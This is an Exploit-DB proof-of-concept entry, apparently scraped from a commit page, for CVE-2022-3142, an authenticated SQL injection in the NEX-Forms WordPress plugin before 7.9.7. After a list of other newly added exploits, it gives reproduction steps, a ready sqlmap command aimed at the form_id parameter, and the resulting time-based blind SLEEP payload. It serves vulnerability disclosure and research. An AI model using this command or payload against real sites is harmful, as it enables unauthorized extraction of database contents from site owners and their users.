7807e6f266
7 changes to exploits/shellcodes/ghdb Azure Apache Ambari 2302250400 - Spoofing Microsoft SharePoint Enterprise Server 2016 - Spoofing Bus Pass Management System 1.0 - Cross-Site Scripting (XSS) NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection Xenforo Version 2.2.13 - Authenticated Stored XSS Windows 11 22h2 - Kernel Privilege Elevation
26 lines
No EOL
1.1 KiB
Text
26 lines
No EOL
1.1 KiB
Text
# Exploit Title: NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi
|
|
# Exploit Author: Elias Hohl
|
|
# Date: 2022-08-01
|
|
# Vendor Homepage: https://basixonline.net
|
|
# Software Link: https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
|
|
# Tested on: Ubuntu 20.04
|
|
# CVE : CVE-2022-3142
|
|
|
|
Authenticated SQL injection vulnerability in the "NEX Forms" Wordpress plugin
|
|
|
|
https://medium.com/@elias.hohl/authenticated-sql-injection-vulnerability-in-nex-forms-wordpress-plugin-35b8558dd0f5
|
|
|
|
1. Start a new Wordpress instance using docker-compose.
|
|
|
|
2. Install the NEX Forms plugin.
|
|
|
|
3. Open the URL "/wp-admin/admin.php?page=nex-forms-dashboard&form_id=1" in your browser. Save the request to "nex-forms-req.txt" via Burp Suite.
|
|
|
|
4. Execute the following command: sqlmap -r nex_forms_req.txt -p form_id --technique=T --dbms=mysql --level 5 --risk 3
|
|
sqlmap will find a time-based blind payload:
|
|
|
|
|
|
Parameter: form_id (GET)
|
|
Type: time-based blind
|
|
Title: MySQL >=5.0.12 AND time-based blind (query SLEEP)
|
|
Payload: page=nex-forms-dashboard&form_id=1 AND (SELECT 4715 FROM (SELECT(SLEEP(5)))nPUi) |